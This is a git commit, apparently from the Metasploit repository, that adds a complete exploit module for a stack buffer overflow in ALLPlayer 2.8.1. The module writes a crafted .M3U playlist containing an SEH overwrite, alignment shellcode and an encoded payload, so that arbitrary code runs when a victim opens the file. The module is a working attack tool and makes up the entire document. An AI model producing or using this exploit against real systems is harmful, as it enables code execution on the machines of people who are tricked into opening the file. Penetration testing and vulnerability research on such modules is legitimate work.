Land #3059 - ALLPlayer M3U Buffer Overfloww

2014-03-04 11:29:52 -06:00 · 2014-03-04 11:29:52 -06:00 · f8310b86d1
parent db76962b4a 408fedef93
commit f8310b86d1
1 changed files with 108 additions and 0 deletions
--- a/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb
+++ b/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb
@ -0,0 +1,108 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'ALLPlayer M3U Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a stack-based buffer overflow vulnerability in
+        ALLPlayer 2.8.1, caused by a long string in a playlist entry.
+        By persuading the victim to open a specially-crafted .M3U file, a
+        remote attacker could execute arbitrary code on the system or cause
+        the application to crash. This module has been tested successfully on
+        Windows 7 SP1.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'metacom',      # Vulnerability discovery
+          'Mike Czumak',  # Original exploit
+          'Gabor Seljan'  # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'BID', '62926' ],
+          [ 'BID', '63896' ],
+          [ 'EDB', '28855' ],
+          [ 'EDB', '29549' ],
+          [ 'EDB', '29798' ],
+          [ 'EDB', '32041' ],
+          [ 'OSVDB', '98283' ],
+          [ 'URL', 'http://www.allplayer.org/' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'ExitFunction' => 'process'
+        },
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'DisableNops'    => true,
+          'BadChars'       => "\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f",
+          'Space'          => 3060,
+          'EncoderType'    => Msf::Encoder::Type::AlphanumUnicodeMixed,
+          'EncoderOptions' =>
+            {
+              'BufferRegister' => 'EAX'
+            }
+        },
+      'Targets'        =>
+        [
+          [ ' ALLPlayer 2.8.1 / Windows 7 SP1',
+            {
+              'Offset' => 301,
+              'Ret'    => "\x50\x45",  # POP POP RET from ALLPlayer.exe
+              'Nop'    => "\x6e"       # ADD BYTE PTR DS:[ESI],CH
+            }
+          ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Oct 09 2013',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u'])
+        ],
+      self.class)
+
+  end
+
+
+  def exploit
+    nop = target['Nop']
+
+    sploit =  rand_text_alpha_upper(target['Offset'])
+    sploit << "\x61\x50"      # POPAD
+    sploit << target.ret
+    sploit << "\x53"          # PUSH EBX
+    sploit << nop
+    sploit << "\x58"          # POP EAX
+    sploit << nop
+    sploit << "\x05\x14\x11"  # ADD EAX,0x11001400
+    sploit << nop
+    sploit << "\x2d\x13\x11"  # SUB EAX,0x11001300
+    sploit << nop
+    sploit << "\x50"          # PUSH EAX
+    sploit << nop
+    sploit << "\xc3"          # RET
+    sploit << nop * 109
+    sploit << payload.encoded
+    sploit << rand_text_alpha_upper(10000) # Generate exception
+
+    # Create the file
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+    file_create("http://" + sploit)
+
+  end
+end
+